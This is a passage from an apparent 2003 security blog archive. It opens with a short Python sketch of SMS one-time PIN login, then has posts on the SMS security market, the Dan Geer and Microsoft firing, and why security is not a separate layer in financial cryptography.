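        def send_sms(phone, text):
            # stand-in for a real GSM/SMS gateway call
            print("SMS to %s: %s" % (phone, text))

        def issue_pin(user, phone):
            pin = "%06d" % secrets.randbelow(10 ** 6)   # uniform 6-digit PIN
            pending[user] = (pin, time.time())
            send_sms(phone, "Your login PIN is " + pin)

        def verify_pin(user, attempt):
            pin, issued = pending.pop(user, (None, 0.0))
            return (pin is not None
                    and time.time() - issued < PIN_TTL
                    and secrets.compare_digest(pin, attempt))

    A password thief gets nothing without the phone; the PIN is single-use (popped on the first attempt) and dies after two minutes.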

    What remains to be seen is if users are prepared to pay 15c each time for the SMS message. In Europe, SMS messaging is the rage, so there won't be much of a problem there, I suspect.

    What's interesting here is that we are seeing the market for security evolve and bypass the rather broken model that was invented by Netscape back in '94 or so. In the absence of structured, institutional, or mandated approaches, we now have half a dozen distinct approaches to web site application security [3].

    As each of the programmes are voluntary, we have a fair and honest market test of the security results [5].

    [1] here's one if it can be seen:
    https://www.e-gold.com/acct/gen3.asp?x=3061&y=62744C0EB1324BD58D24CA4389877672
    Hopefully that doesn't let you into my account! It's curious: if you change the numbers in the above URL, you get a similar drawing, but it is wrong...
    [2] All companies are .com, unless otherwise noted.
    [3] As well as the activity on the gold side, there are the adventures of PayPal with its pairs of tiny payments made to users' conventional bank accounts.
    [4] http://www.netpay.tv/news.htm
    [5] I just thought of an attack against NetPay.TV, but I'll keep quiet so as not to spoil anyone else's fun :-)

    Posted by iang at 12:20 PM | Comments (0) | TrackBack

    September 28, 2003

    Nobody ever got Fired for Buying Microsoft!

    It is now clear that the U.S. Department of Homeland Security need rely on no-one to advise them on computer security risks to the homeland. The binary choice of Microsoft as either a) good or b) bad has now become a unary choice of a) good. At least, by all gainfully employed security experts [1].

    So, why waste the taxpayer's money in asking anyone?

    This may make USG purchasing decisions easy, but the expulsion of Dan Geer was rather ham fisted, and will haunt Microsoft in the private sector for some time.

    IBM used to pull this trick, back in the good old days of pre-net (I'm talking the 70's and 80's here...). Then, if you went up against the IBM purchasing decision, you knew your job was on the line.

    Everyone in the industry knew what "nobody ever got fired..." meant. It didn't only mean that your job was safe if you bought IBM, it also meant that you could be receiving your pink slip for challenging the decision.

    Thankfully, those days are long gone, and IBM has real competitors to protect each and every purchasing IT decision maker against the manipulations of a dominating provider. Yet, Microsoft seems to have blundered into this situation without realising the dangers. It has handed its competitors a no-risk sales argument, as they will never let anyone forget that Microsoft wields immense power - distorting, damaging, and blind power that can do as much harm to the purchaser as it can do good.

    Not to mention AtStake, who will probably sink into the mire of the old party game: "remember AtStake?" What on earth are people going to say when they hear that AtStake has been hired to work on securing the next generation of Aegis cruisers or the new Total Awareness Solution?

    "Oh, we'll be safe until someone gets fired..."

    "At least anyone who's fired can get a job with El Qaeda..."

    The good news is that if they do go down, at least the employees will have the added benefit of being fired by @Stake.

    I wonder how long it will be before people have forgotten the true pedigree of the phrase "nobody ever got fired for buying IBM?"

    [1] These links have been posted on the cryptography archives:
    bostonherald
    ecommercetimes
    mgnetwork

    Posted by iang at 08:19 PM | Comments (2) | TrackBack

    September 16, 2003

    The Insecurity of FC

    Why is there no layer for Security in FC?

    (Actually, I get this from time to time. "Why no X? ?!?" It takes a while to develop the answer for each one. This one is about security, but I've also been asked about Law and Economics.)

    Security is all pervasive. It is not an add on. It is a requirement built in from the beginning and it infects all modules.

    Thus, it is not a layer. It applies to all of them, although Security will be more present in the lower layers.

    Well, perhaps that is not true. It could be said that Security divides into internal and external threats, and the lower layers are more normally about external threats. The Accounting and Governance layers are more normally concerned with the insider threat.

    Superficially, security appears to be lower in the stack. But a true security person recognises that an internal threat is more damaging, more dangerous, and more frequent in reality than an external threat. In fact, real security work is often more about insider threats than outsider threats.

    So, it's not even possible to be vaguely narrow about Security. Even the upper layers, Finance and Value, are critical, as you can't do much security until you understand the application that you are protecting and its concomitant values.

    Posted by iang at 11:56 AM | Comments (2) | TrackBack